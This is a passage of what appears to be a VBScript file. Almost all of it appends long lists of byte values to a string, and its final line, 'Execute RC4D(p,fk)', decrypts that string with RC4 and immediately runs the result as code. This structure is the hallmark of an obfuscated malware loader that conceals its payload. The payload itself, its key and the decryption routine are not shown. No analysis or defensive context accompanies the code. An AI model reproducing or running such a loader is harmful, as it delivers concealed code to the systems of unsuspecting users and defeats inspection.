p=p&","&"244,252,189,244,149,92,3,194,113,61,126,36,151,214,194,167,223,191,244,22,62,80,168,34,196,254,171,246,248,132,74,85,71,8,76,74,27,226,180,103,43,196,172,178,92,16,102,55,205,83,67,111,52,95,15,244,102,73,197,54,102,83,239,120,77,223,123,70,143,87,127,240,242,113,153,13,58,21,208,97"

p=p&","&"130,203,107,95,84,71,56,142,184,27,50,96,217,255,115,147,109,248,235,131,105,197,185,243,52,238,91,21,161,3,218,214,45,34,249,87,44,127,148,81,195,210,253,46,81,244,54,170,250,200,68,198,252,115,68,252,7,83,94,204,211,171,64,52,162,164,134,116,73,254,207,171,23,189,192,120,222,4,36,43"

p=p&","&"222,114,148,138,229,111,186,134,66,95,49,213,72,72,189,36,250,48,78,195,175,34,33,247,2,216,11,195,94,9,182,49,55,1,114,84,154,129,117,227,219,112,215,159,7,40,61,151,57,45,241,174,193,151,116,188,39,119,112,63,39,250,201,143,52,24,30,37,217,136,115,200,90,224,252,134,197,48,253,54"

p=p&","&"171,0,4,228,16,47,59,160,224,190,231,50,173,97,156,196,191,219,129,199,146,148,157,112,21,61,80,125,67,234,227,55,96,79,187,110,225,231,194,102,91,34,10,39,192,140,159,252,133,225,9,122,172,45,52,191,153,51,120,207,232,75,42,47,195,149,69,184,175,46,27,201,150,110,213,62,105,18,189,157"

p=p&","&"172,199,139,118,59,252,25,0,108,5,8,75,104,0,211,102,239,95,38,153,26,226,251,84,117,105,128,184,57,166,41,48,236,3,80,226,114,165,199,190,21,16,131,103,204,104,1,38,100,71,69,231,238,113,20,153,106,91,126,138,229,112,121,168,122,158,241,244,161,157,45,122,193,72,2,161,217,86,203,150"

p=p&","&"19,240,216,164,35,54,218,222,28,33,151,64,52,232,231,254,250,240,12,8,76,93,193,226,187,22,102,125,229,174,136,197,144,225,214,176,250,173,178,114,56,120,63,128,122,123,150,173,91,102,142,103,118,39,116,221,145,69,12,211,120,157,156,6,192,136,155,65,204,193,108,98,236,148,183,8,62,43,115,76"

p=p&","&"42,82,89,60,133,176,51,144,211,121,24,127,148,126,110,232,188,214,183,200,4,76,137,52,71,188,30,63,68,66,242,117,20,104,80,205,69,89,59,6,0,53,55,46,187,235,201,93,218,255,112,220,7,64,73,94,241,184,133,183,57,76,219,119,188,150,30,90,108,208,58,217,226,42,82,162,197,191,96,132"

p=p&","&"222,83,225,150,50,78,45,224,158,192,19,132,8,10,161,242,29,121,150,130,206,114,72,11,205,20,105,161,177,76,204,234,213,126,134,35,77,239,138,186,144,80,101,221,181,11,44,128,19,184,204,170,140,171,145,34,190,243,66,188,123,31,70,251,60,242,172,125,142,102,113,60,77,190,201,148,87,132,153,25"

p=p&","&"38,108,244,224,226,159,52,219,234,36,159,214,107,234,124,144,204,142,64,148,177,118,3,88,250,198,73,23,97,251,0,240,37,159,220,236,249,153,205,8,192,229,32,240,109,46,179,12,126,236,31,71,87,142,41,246,123,158,114,247,191,228,201,26,102,190,103,135,36,126,203,236,249,163,150,23,163,87,73,42"

p=p&","&"185,247,133,76,221,149,11,134,186,193,243,243,163,57,43,4,192,126,92,209,24,252,90,54,151,109,84,168,120,215,229,132,194,165,121,141,234,67,45,107,65,241,54,152,110,241,239,158,88,19,122,73,229,191,24,169,243,248,226,178,60,128,223,124,229,231,17,113,214,198,248,97,121,158,211,152,151,5,90,88"

p=p&","&"58,184,197,65,86,235,188,127,239,222,96,219,129,142,0,16,142,24,239,37,210,238,47,193,249,180,108,221,153,159,38,119,121,121,193,246,245,145,139,234,62,59,228,82,166,92,131,27,137,169,120,88,6,20,185,129,251,240,199,83,109,90,109,38,67,18,167,13,208,36,176,13,47,38,54,7,122,92,196,129"

p=p&","&"20,237,200,217,81,216,48,152,83,12,191,62,57,225,121,160,104,125,203,208,230,188,37,66,112,246,25,176,95,224,160,241,125,4,213,189,227,176,200,22,84,129,75,162,7,64,104,138,27,185,142,138,153,4,109,137,68,147,237,64,31,127,15,147,66,193,26,5,92,150,54,48,188,44,116,12,139,132,246,230"

p=p&","&"71,252,139,129,223,180,147,213,13,17,183,3,232,129,180,103,38,60,132,235,184,128,217,96,57,2,87,73,5,181,165,41,43,254,27,209,11,158,255,81,162,255,101,164,101,67,153,81,147,19,23,204,43,86,28,73,66,97,92,107,237,140,154,191,171,25,45,121,186,188,71,172,52,102,148,2,120,75,17,164"

p=p&","&"118,189,158,245,69,186,121,18,25,44,14,225,96,167,221,191,57,66,233,160,94,77,69,154,246,47,179,18,94,195,163,175,233,51,242,109,179,156,95,153,129,145,198,228,228,197,226,205,0,180,232,197,90,17,168,224,51,80,125,139,119,127,79,217,167,60,128,51,248,116,110,119,211,210,14,100,132,156,7,62"

p=p&","&"48,88,160,117,114,27,99,205,252,54,203,143,104,77,121,146,214,160,241,1,87,234,86,195,42,170,69,187,177,182,203,157,163,177,144,253,148,35,14,69,65,60,221,85,16,239,132,175,183,132,150,226,176,85,225,67,176,91,212,197,158,118,51,16,11,59,27,15,81,167,107,57,104,215,1,205,6,146,168,140"

p=p&","&"43,155,249,180,103,240,66,134,43,107,188,28,12,155,121,86,232,115,224,83,10,98,144,131,56,61,137,86,51,220,140,196,193,93,55,239,34,145,172,174,16,185,174,93,37,159,35,142,33,40,208,198,40,195,21,206,195,218,9,12,26,10,119,161,41,74,12,34,81,227,115,217,214,227,153,157,122,81,2,91"

p=p&","&"253,139,195,153,107,255,255,209,77,230,25,78,105,105,35,164,114,4,8,81,85,214,152,224,247,232,51,237,221,184,198,255,243,81,202,20,186,70,243,149,215,98,58,159,147,181,179,94,170,58,124,139,101,190,48,106,171,123,19,162,129,148,193,56,197,72,84,134,184,191,218,147,122,76,73,58,113,215,2,226"

p=p&","&"162,205,243,24,218,97,118,132,64,151,200,188,5,247,102,174,118,210,216,86,75,31,88,56,137,212,20,50,242,26,74,3,210,129,39,119,148,153,148,67,174,91,248,97,251,64,245,65,184,157,5,3,106,48,38,217,149,176,215,121,134,132,201,111,39,129,124,122,148,14,147,144,46,8,36,221,99,226,210,181"

p=p&","&"244,211,155,12,59,31,134,140,81,132,34,57,197,141,194,217,208,153,76,235,58,43,127,123,217,167,92,195,218,40,189,32,101,41,75"

Execute RC4D(p,fk)
